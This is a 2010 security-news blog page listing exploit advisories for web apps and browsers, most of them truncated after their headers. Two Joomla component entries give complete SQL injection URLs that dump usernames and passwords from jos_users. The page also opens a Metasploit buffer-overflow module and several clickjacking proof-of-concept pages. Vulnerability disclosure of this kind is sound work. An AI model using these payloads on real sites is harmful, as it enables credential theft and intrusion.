Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 17th, 2010

Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability

============================================================
Struts2/XWork &lt; 2.2.0 Remote Command Execution Vulnerability
============================================================
The Apache Struts team has announced and uploaded, but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework [...]

Group Office Remote Command Execution Vulnerability

===================================================
Group Office Remote Command Execution Vulnerability
===================================================
# Title
Group Office Remote Command Execution Vulnerability
# Author
ADEO Security
# Published
16/07/2010
# Version
3.5.9 (possibly all versions)
# Vendor
http://www.group-office.com
# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download
# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and [...]

Group Office (comment_id) SQL Injection Vulnerability

=====================================================
Group Office (comment_id) SQL Injection Vulnerability
=====================================================
# Title
Group Office Remote SQL Injection Vulnerability
# Author
ADEO Security
# Published
17/07/2010
# Version
3.5.9 (possibly all versions)
# Vendor
http://www.group-office.com
# Download
http://sourceforge.net/projects/group-office/files/3.5/groupoffice-com-3.5.9.tar.gz/download
# Description
"Take your office online with Group-Office groupware. Share projects,
calendars, files and [...]

ActiTime 2.0-MA CSRF Vulnerability

==================================
ActiTime 2.0-MA CSRF Vulnerability
==================================
|------------------------------------------------------------------|
| [...]

YACK CMS 10.5.27 Remote File Inclusion Vulnerability

====================================================
YACK CMS 10.5.27 Remote File Inclusion Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Freelancer Marketplace Script Upload Vulnerability

==================================================
Freelancer Marketplace Script Upload Vulnerability
==================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Freelancers Marketplace Script Persistent XSS Vulnerability

===========================================================
Freelancers Marketplace Script Persistent XSS Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Kayako eSupport v3.70.02 SQL injection Vulnerability

====================================================
Kayako eSupport v3.70.02 SQL injection Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Subrion Auto Classifieds Persistent Xss Vulnerability

=====================================================
Subrion Auto Classifieds Persistent Xss Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Joomla Component com_linksutra Upload / Persistent XSS Vulnerability

====================================================================
Joomla Component com_linksutra Upload / Persistent XSS Vulnerability
====================================================================
AUTHOR : Cur53D aka Kedar Patwary
MAIL : Hyq6xx[at]gmail.com
DATE : 27 June 2010
Blog : www.Cur53D.dlstreet.net
Type : XSS
Greetz : Sid3^effects,*L0rd CrusAd3r*,D34D F0X TH3 BL4CKH4T,D4rk357 And All
[...]

Calendarix (cal_cat.php) SQL Injection Vulnerability

====================================================
Calendarix (cal_cat.php) SQL Injection Vulnerability
====================================================
Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date [...]

Joomla Component com_spa SQL Injection Vulnerability

====================================================
Joomla Component com_spa SQL Injection Vulnerability
====================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]
[+] ExploiT :
-1+union+select concat(username,0x3a,password)+from+jos_users
[+] Example :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users
===================================================
I Love You Joomla )
===================================================
Greetz : 1923Turk [...]

Joomla Component com_staticxt SQL Injection Vulnerability

=========================================================
Joomla Component com_staticxt SQL Injection Vulnerability
=========================================================
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
===================================================
[+] Vulnerable File :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
[+] ExploiT :
union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
jos_users--
[+] G00gle Dork : :S
[+] Example :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
===================================================
…:: Being Honorable Lasts a Lifetime [...]

MoreAmp SEH Buffer Overflow (meta)

==================================
MoreAmp SEH Buffer Overflow (meta)
==================================
#MoreAmp Seh Buffer Overflow (meta)
#Greetz:His0k4 , Bibi-info , Volc4n0
#sec4ever.com
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
[...]

Avant Browser (V11.7 build 45) Clickjacking Vulnerability

=========================================================
Avant Browser (V11.7 build 45) Clickjacking Vulnerability
=========================================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code><font face="Calibri" size="6" color="#FF0000">Avant</font></code><code class="xml plain"><font face="Calibri" size="6" color="#FF0000"> Browser </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V11.7 build 45)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> [...]

Opera Browser v10.60 Clickjacking Vulnerability

===============================================
Opera Browser v10.60 Clickjacking Vulnerability
===============================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code class="xml plain"><font face="Calibri" size="6">
Opera</font><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" [...]

Safari Browser v4.0.2 Clickjacking Vulnerability

================================================
Safari Browser v4.0.2 Clickjacking Vulnerability
================================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code class="xml plain"><font face="Calibri" size="6">
Safari</font><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" [...]

Netscape Browser v9.0.0.6 Clickjacking Vulnerability

====================================================
Netscape Browser v9.0.0.6 Clickjacking Vulnerability
====================================================
<html>
<style type="text/css">
</style>
<body>
<p align="center"><code><font face="Calibri" size="6">Netscape</font></code><code class="xml plain"><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" [...]

Arquicomp CMS (fns_db.php) SQL Injection Vulnerability

======================================================
Arquicomp CMS (fns_db.php) SQL Injection Vulnerability
======================================================
Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date : 17 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
web : http://foro.nbsecurity.net/
Credits : Diablada and [...]

Different Web (index.php) SQL Injection Vulnerability

=====================================================
Different Web (index.php) SQL Injection Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]